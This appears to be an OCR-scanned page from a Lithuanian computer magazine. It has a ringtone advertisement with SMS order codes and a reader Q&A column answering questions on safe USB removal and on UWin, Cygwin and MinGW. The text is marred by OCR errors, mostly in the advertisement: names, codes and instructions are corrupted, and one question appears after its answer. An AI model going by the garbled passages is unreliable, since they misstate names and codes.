WALTERS A KAŽA - Feelings This Touch 5410032135 
SHAKIRA - Don't Bother S410052141 
EROS RAMAZZOTT -La Nostra Vita 5410092109 
DAVID GUETTA -In Love Wh Mysel! St10092116 


2Lt etuviškos 


LINAS IR SIMONA - Albino Kalėdos 5410092138 
DELFINAI - Ačiū tau 5410092043 
ATLANTA - Žalios mėtos 5410092012 
DEIVIS -Vis tiek aš laimingas 5410092019 
NEO - Tavo delne 3410092049 
KASTANEDA - Argentina 5410092057 
MILANA - Mylėk karštai 3410092111 
YVA-Tikaš r tik tau 5410092132 
SELTONA - Mariana 3410092042 
RYTIS CICINAS - Meilės jūra 5410091924 
ARTAS - Graži jauna pana 5410091939 
DŽORDANA - Nebenoriu laukti 5410091842 
CISKO KID - Ančiukų tokis 5410091005 
V. RIAUBIŠKYTĖ - Ramunę baltąją 5410091785 
LAURA 8 THE LOVERS - Be The One 5410092100 
LINAS IR SIMONA - Saulės pėdomis =410092125 
MOKINUKĖS - Maža širdelė 5410092125 
MĖSA -6 nebūsiu 5410091984 
MOKINUKĖS - Baby 5410091985 
TAJA - Saulė 5410001080 
B'AVARIJA ši V. RIAUBIŠKYTĖ -Aš tavo 5410092144 
AMBERLIFE - Tako Mo. 5410091855 
JURGA - Nebijok 2410091856 
MONOTONINĖ POUFONNĖ 

1. Rašyk žinutę su: Mir kodu: || 1. Rašyk žinut su P Ir kodu, 
pvz. MaS10052107, arai pz. ESA NO2107, 


Miša 10052107 S70E860000X E 
2. Siųsk numeriu: 

KELODIJOS MONOTOKINĖS: NOKIA. ins dela 
MELODIJOS POLEONIUĖS: KO SAUSIS MOTORYKA 
ŠENEMS, SONY-ERICESONI, LG PANASONUC au WAP uziatymas 


PRIEŠ UŽDUODAMAS KLAUSIMĄ 
PAGALVOK! MAN NEVERTA SIŲSTI 
KLAUSIMŲ, VIENAIP AR KITAIP 
SUSIJUSIŲ SU HAKINIMU/KREKI- 
NIMU/FRYKINIMU — TAM SKIRTAS 
„HACK-FAG“, TAIP PAT NEVERTA 
UŽDAVINĖTI AKIVAIZDŽIAI LAME- 
RIŠKŲ KLAUSIMŲ, ATSAKYMUS Į 
KURIUOS BENT KIEK NORĖDAMAS 
GALI RASTI IR PATS. AŠ NE TELE- 
PATAS, TODĖL KONKRETIZUOK 
KLAUSIMĄ IR ATSIŲSK KUO 
DAUGIAU INFORMACIJOS. 


0) USB įrenginių atjungimui Windows sistemoje nu- 
matyta speciali priemonė — saugus įrenginių at- 
jungimas (safe hardware removal). Niekada ja ne- 
sinaudojau ir kol kas dar nesugadinau nė vieno įrengi- 
nio. Todėl ir klausiu: kiek reikalingas šis „Microsoft“ 
įrankis? Visi mano draugai besąlygiškai juo naudojasi 
(bijo sugadinti flash atmintis), tačiau man jo panaudo- 
jimo prasmė gana abejotina. 


Į Windows sistema įmontuotas saugaus įrenginių at- 

jungimo įrankis iš tiesų gali būti naudingas, tačiau tik 

kartais, retais atvejais. USB specifikacija iš karto nu- 
mato „karštą“ įrenginių prijungimą ir atjungimą, todėl tą 
pačią flash atmintį iš kompiuterio galima visiškai saugiai 
ištraukti bet kuriuo metu. Tegu į ją dideliu greičiu perduo- 
dami duomenys: po atjungimo jai bet kokiu atveju blogiau 
nebus. Visai kas kita, kad dalis duomenų (galbūt net labai 
svarbūs) į ją nepateks. Ar supranti, kurlink aš suku? Tam ir 
reikia to „saugaus įrenginių atjungimo“, kad išvengtum po- 
tencialaus duomenų praradimo ir neigiamos įtakos progra- 
mų bei visos sistemos darbui. Principas labai paprastas: 
jeigu šiuo metu USB įrenginys nėra naudojamas, jį galima 
atjungti. Jeigu į jį kreipiamasi geriau to daryti nereikia. 


- (G 


Apie viską iš eilės. 

UWin (www.research.att.com/sw/tools/uwin/) tai 

faktiškai UNIX sistemų emuliatorius. Jį salyginai galima 

suskaidyti į dvi dalis. Pirmoji, kuri yra svarbiausia tai 

bibliotekos ir antraščių bylos, kuriose pilnai realizuo- 
tas UNIX API. Jų reikia tam, kad būtų galima langinėse 
kompiliuoti unix programas ir sėkmingai jas naudoti. Ant- 
roji dalis yra pats UNIX emuliatorius, kuris apjungia dau- 
gybę *nix'inių įrankių, taip pat ir programas-aplinkas: 
bash, csh, zsh. UWin Unix failų sistemą pilnai emuliuo- 
ja NTFS failų sistemoje ir dalinai FAT/FAT32 siste- 
mose. Uwin failų sistemą atvaizduoja štai taip: šakni- 
niame kataloge (root, /) yra įprastiniai /bin, /usr, /lib, 
var, /proc ir (tmp. 
Cygwin (www.cygwin.com) — tai dar vienas *nix'ų emu- 
liatorius, kuris yra žinomesnis ir funkcionalesnis. Jis pla- 
tinamas kaip viena vienintelė įdiegimo byla, o reikiami 
paketai išrenkami iš sąrašo ir parsiunčiami iš oficialios 
svetainės tiesiog įdiegimo metu. Norint turėti galimybę 
kompiliuoti unix programų išeities tekstus. reikia įdiegti 
gcc, standartinį bibliotekų rinkinį ir įrankį make. Po to 
daugelio programų kompiliavimas neturėtų kelti proble- 
mų, o sukompiliuotas programas galima lengvai paleisti 
bet kuriame kitame kompiuteryje, tik su sąlyga, jog Win- 
dows kataloge bus įkurdinta nedidelė byla cygwin1.dll. 
MinGW (www.mingw.org) paketas, priešingai nei Cygwin ir 
Uwin, nėra UNIX OS emuliatorius, tačiau leidžia Windows 
sistemoje kompiliuoti *nix'ines programas. | paketą įeina 
visi reikalingi dalykai: gcc kompiliatorius, įrankis make ir stan- 
dartinių modulių rinkinys. Svarbiausias MinGW privalumas 
yra jo paprastumas. Pakanka iš interneto parsisiųsti vienin- 
telę bylą, į kurią surinkta viskas, po ko *nix'inių programų 
kompiliavimas nekels jokių problemų. 


()) Kuo skiriasi „Uwin“, „CygWin“ ir „MinGW“? 
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